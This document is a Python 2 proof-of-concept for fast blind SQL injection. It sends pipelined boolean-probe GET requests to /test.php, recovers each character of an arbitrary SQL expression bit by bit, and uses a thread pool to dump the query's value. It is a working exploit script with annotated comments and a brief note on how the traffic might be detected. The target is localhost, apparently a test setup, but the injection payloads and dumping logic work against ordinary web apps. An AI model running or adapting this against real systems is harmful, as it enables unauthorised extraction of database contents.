PoC for fast Blind SQL-Injection dumping
import socket, time, re, sys
from multiprocessing.dummy import Pool as ThreadPool
# Response-body fragments used to classify each probe reply: `bad_answ` is an
# empty result table, `good_answ` is a table containing one row of three cells.
# Only these two exact substrings are recognised; any other reply is ignored.
bad_answ = """<table>
</table>"""
good_answ = """<table>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
</table>"""
s_time = time.time()  # wall-clock start, reported in the final "Time:" line
# argv[3]: seconds to wait after sending the pipelined requests before the
# single recv() that reads all replies (see request()).
timeout = float(sys.argv[3]) # Set timeout for correct keep-alive
# argv[2]: worker count. multiprocessing.dummy.Pool is a *thread* pool.
pool = ThreadPool(int(sys.argv[2])) # Count threads
# NOTE: there is no argument-count check; a missing argv entry raises
# IndexError here, outside the try/except at the bottom of the script.
print "Threads count - "+sys.argv[2]
print "Timeout for keep-alive - "+sys.argv[3]
def request(len, query):
    """Recover one character of `query` via eight pipelined boolean probes.

    Opens a fresh TCP connection to 127.0.0.1:80 and sends, on one keep-alive
    connection, eight GET requests that each test a single bit of the `len`-th
    character of `query` (bit extracted with substr/HEX/CONV/REVERSE), followed
    by a HEAD request with `Connection: close`. After `timeout` seconds the
    replies are read with a single recv(), split on the blank line that ends
    each HTTP header block, and classified against `good_answ`/`bad_answ`.

    Returns the reconstructed character (the bit string is reversed before
    conversion because the probes walk the reversed binary representation).

    Detection note: this traffic shape -- many pipelined GETs on one connection,
    identical query strings differing only in two numeric positions, followed by
    a HEAD -- is what a WAF or access-log review would see for this technique.

    Caveats visible in the code:
    - `len` shadows the builtin of the same name (harmless here, but confusing).
    - `s.close()` after the `return` is unreachable, so the socket is left for
      the garbage collector.
    - A reply matching neither marker appends no bit, silently misaligning the
      result; if no reply matches, `int("", 2)` raises ValueError.
    - A single recv() may return only part of the pipelined replies; the sleep
      is the only thing standing in for proper response framing.
    """
    num = ""
    req = ""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1", 80))
    # One GET per bit position 1..8 of the target character.
    for pg_n in range(1,9):
        req += "GET /test.php?a=1+and+substr(REVERSE(CONV(HEX(substr("
        req += query+",+"+str(len)+",1)),+16,+2)),+"+str(pg_n)+",+1)=1+--+ HTTP/1.1\r\n"
        req += "Host: 127.0.0.1\r\nConnection: keep-alive\r\n\r\n"
    # Trailing HEAD with Connection: close makes the server end the connection
    # after the eight replies.
    req += "HEAD /test.php HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: close\r\n\r\n"
    s.send(req)
    time.sleep(timeout)  # wait for all pipelined replies before the one recv()
    res = s.recv(640000000)
    # Each piece is "<body of previous reply>HTTP/1.x <next headers>"; the text
    # before "HTTP/1." is the body being classified.
    for i in res.split("\r\n\r\n"):
        if good_answ in i.split("HTTP/1.")[0]:
            num+="1"
        elif bad_answ in i.split("HTTP/1.")[0]:
            num+="0"
    return chr(int(num[::-1], 2))
    s.close()  # unreachable: placed after the return above
def request_len(inj):
    """Recover the decimal length of `inj` as a string of up to four characters.

    Calls request() for positions 1..4 of `length(inj)`. Positions past the end
    of the length string presumably yield all-zero bits, i.e. a '\\0' character
    (inferred from the split below; not shown by the code itself), so the
    result is truncated at the first NUL before being printed and returned.
    Only lengths of at most four digits can be represented.
    """
    reslt = ""
    for i in range(1,5):
        reslt+=request(i, "length("+inj+")")
    print "\nLength is "+reslt.split('\0')[0]
    return reslt.split('\0')[0]
def make_request(inj):
    """Recover the full value of `inj`: length first, then every character.

    Characters are fetched concurrently through the module-level `pool`, one
    request() call (and one TCP connection) per position 1..length. `int(str_len)`
    raises ValueError if request_len() returned something non-numeric.
    """
    str_len = request_len(inj)
    reslt = ""
    # Sequential version kept for reference; superseded by the pool.map below.
    # for i in range(1,int(str_len)+1):
    # print reslt
    # reslt+=request(i, inj)
    reslt = pool.map(lambda x: request(x, inj), range(1,int(str_len)+1))
    return ''.join(reslt)
# Entry point: argv[1] is wrapped in parentheses and dumped.
# NOTE: the bare except swallows every error (socket failures, ValueError from
# int()/chr(), KeyboardInterrupt on Python 2), so a failed run prints only the
# elapsed time with no indication of what went wrong.
try:
    print("\nResult - %s" % make_request("("+sys.argv[1]+")"))
except:
    pass
# Reported unit is "ms" but the value is time.time() seconds.
print("\nTime: %sms" % (time.time() - s_time))